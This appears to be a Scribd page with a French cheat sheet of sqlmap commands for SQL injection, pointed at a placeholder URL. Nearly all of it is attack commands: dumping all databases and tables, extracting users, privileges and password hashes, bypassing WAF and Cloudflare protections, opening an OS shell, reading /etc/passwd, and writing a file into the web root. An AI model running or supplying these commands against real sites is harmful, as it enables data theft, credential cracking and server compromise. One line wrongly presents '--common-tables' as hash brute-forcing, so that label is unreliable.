Scribd
Importer
33 vues2 pages

Commandes SQLMap pour tests de vulnérabilité

Le document fournit une série de commandes sqlmap pour détecter et exploiter les vulnérabilités SQL sur un site web. Il couvre des actions telles que la détection de bases de données, l'extraction d'utilisateurs, le dump de données, et l'exécution de commandes système. Des techniques pour contourner des protections comme WAF et Cloudflare sont également mentionnées.

Transféré par

nqsjmmw2bn
Copyright
© All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats TXT, PDF, TXT ou lisez en ligne sur Scribd
33 vues2 pages

Commandes SQLMap pour tests de vulnérabilité

Le document fournit une série de commandes sqlmap pour détecter et exploiter les vulnérabilités SQL sur un site web. Il couvre des actions telles que la détection de bases de données, l'extraction d'utilisateurs, le dump de données, et l'exécution de commandes système. Des techniques pour contourner des protections comme WAF et Cloudflare sont également mentionnées.

Transféré par

nqsjmmw2bn
Copyright
© All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats TXT, PDF, TXT ou lisez en ligne sur Scribd

# Détection de vulnérabilité SQL

sqlmap -u "[Link] --dbs

# Détection et identification automatique


sqlmap -u "[Link] --banner

# Recherche des utilisateurs de la base de données


sqlmap -u "[Link] --users

# Dump de toutes les bases de données


sqlmap -u "[Link] --dump-all

# Dump d'une base de données spécifique


sqlmap -u "[Link] -D database_name --dump

# Dump d'une table spécifique


sqlmap -u "[Link] -D database_name -T table_name --dump

# Enumération des colonnes d'une table


sqlmap -u "[Link] -D database_name -T table_name --columns

# Enumération des tables d'une base de données


sqlmap -u "[Link] -D database_name --tables

# Contournement de WAF (User-Agent aléatoire et retard)


sqlmap -u "[Link] --random-agent --delay=2

# Injection basée sur UNION


sqlmap -u "[Link] --technique=U

# Injection basée sur Booléen


sqlmap -u "[Link] --technique=B

# Injection basée sur Erreur


sqlmap -u "[Link] --technique=E

# Injection basée sur Time-Based Blind


sqlmap -u "[Link] --technique=T

# Test de toutes les techniques


sqlmap -u "[Link] --technique=UBET

# Bypass Cloudflare
sqlmap -u "[Link] --tamper=between,randomcase

# Utilisation de cookies d'authentification


sqlmap -u "[Link] --cookie="PHPSESSID=12345"

# Exécution de commandes système (si SQL shell est disponible)


sqlmap -u "[Link] --os-shell

# Récupération des privilèges des utilisateurs


sqlmap -u "[Link] --privileges

# Récupération des hash de mots de passe


sqlmap -u "[Link] --passwords

# Bruteforce des hash avec une wordlist


sqlmap -u "[Link] --passwords --common-tables
# Recherche des fichiers sur le serveur
sqlmap -u "[Link] --file-read="/etc/passwd"

# Upload de fichiers sur le serveur


sqlmap -u "[Link] --file-write="/tmp/[Link]" --file-
dest="/var/www/html/[Link]"

Vous aimerez peut-être aussi